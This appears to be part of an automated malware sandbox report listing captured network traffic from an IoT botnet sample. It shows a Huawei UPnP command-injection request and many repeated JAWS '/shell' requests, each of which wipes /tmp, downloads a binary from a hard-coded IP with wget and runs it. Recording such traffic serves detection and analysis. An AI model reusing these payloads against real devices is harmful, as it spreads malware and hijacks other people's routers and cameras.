3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: unknownDNS traffic detected: query: scamanje.stresserit.pro replaycode: Name error (3)
          Source: unknownTCP traffic detected without corresponding DNS query: 38.114.7.108
          Source: unknownTCP traffic detected without corresponding DNS query: 112.141.173.28
          Source: unknownTCP traffic detected without corresponding DNS query: 207.157.41.28
          Source: unknownTCP traffic detected without corresponding DNS query: 175.36.18.170
          Source: unknownTCP traffic detected without corresponding DNS query: 151.170.191.154
          Source: unknownTCP traffic detected without corresponding DNS query: 151.56.241.31
          Source: unknownTCP traffic detected without corresponding DNS query: 144.52.107.24
          Source: unknownTCP traffic detected without corresponding DNS query: 163.155.116.239
          Source: unknownTCP traffic detected without corresponding DNS query: 85.231.229.188
          Source: unknownTCP traffic detected without corresponding DNS query: 17.250.91.183
          Source: unknownTCP traffic detected without corresponding DNS query: 108.140.146.147
          Source: unknownTCP traffic detected without corresponding DNS query: 173.181.189.228
          Source: unknownTCP traffic detected without corresponding DNS query: 122.148.140.190
          Source: unknownTCP traffic detected without corresponding DNS query: 150.181.173.225
          Source: unknownTCP traffic detected without corresponding DNS query: 35.122.63.16
          Source: unknownTCP traffic detected without corresponding DNS query: 147.78.84.141
          Source: unknownTCP traffic detected without corresponding DNS query: 153.83.109.219
          Source: unknownTCP traffic detected without corresponding DNS query: 51.156.239.173
          Source: unknownTCP traffic detected without corresponding DNS query: 94.50.141.244
          Source: unknownTCP traffic detected without corresponding DNS query: 178.217.5.22
          Source: unknownTCP traffic detected without corresponding DNS query: 132.32.186.108
          Source: unknownTCP traffic detected without corresponding DNS query: 95.51.226.164
          Source: unknownTCP traffic detected without corresponding DNS query: 37.181.215.63
          Source: unknownTCP traffic detected without corresponding DNS query: 139.182.82.91
          Source: unknownTCP traffic detected without corresponding DNS query: 198.137.128.175
          Source: unknownTCP traffic detected without corresponding DNS query: 153.158.28.8
          Source: unknownTCP traffic detected without corresponding DNS query: 222.209.150.33
          Source: unknownTCP traffic detected without corresponding DNS query: 80.129.205.180
          Source: unknownTCP traffic detected without corresponding DNS query: 106.212.24.177
          Source: unknownTCP traffic detected without corresponding DNS query: 207.58.89.49
          Source: unknownTCP traffic detected without corresponding DNS query: 159.26.209.223
          Source: unknownTCP traffic detected without corresponding DNS query: 39.214.51.249
          Source: unknownTCP traffic detected without corresponding DNS query: 179.7.190.239
          Source: unknownTCP traffic detected without corresponding DNS query: 196.252.226.169
          Source: unknownTCP traffic detected without corresponding DNS query: 165.198.243.105
          Source: unknownTCP traffic detected without corresponding DNS query: 198.168.242.37
          Source: unknownTCP traffic detected without corresponding DNS query: 74.91.135.35
          Source: unknownTCP traffic detected without corresponding DNS query: 37.184.6.218
          Source: unknownTCP traffic detected without corresponding DNS query: 118.151.23.151
          Source: unknownTCP traffic detected without corresponding DNS query: 108.104.198.219
          Source: unknownTCP traffic detected without corresponding DNS query: 2.223.86.224
          Source: unknownTCP traffic detected without corresponding DNS query: 93.109.67.30
          Source: unknownTCP traffic detected without corresponding DNS query: 31.120.236.139
          Source: unknownTCP traffic detected without corresponding DNS query: 171.216.222.154
          Source: unknownTCP traffic detected without corresponding DNS query: 9.164.2.0
          Source: unknownTCP traffic detected without corresponding DNS query: 157.173.155.208
          Source: unknownTCP traffic detected without corresponding DNS query: 1.240.253.96
          Source: unknownTCP traffic detected without corresponding DNS query: 25.42.120.173
          Source: unknownTCP traffic detected without corresponding DNS query: 76.7.242.222
          Source: unknownTCP traffic detected without corresponding DNS query: 72.158.13.10
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
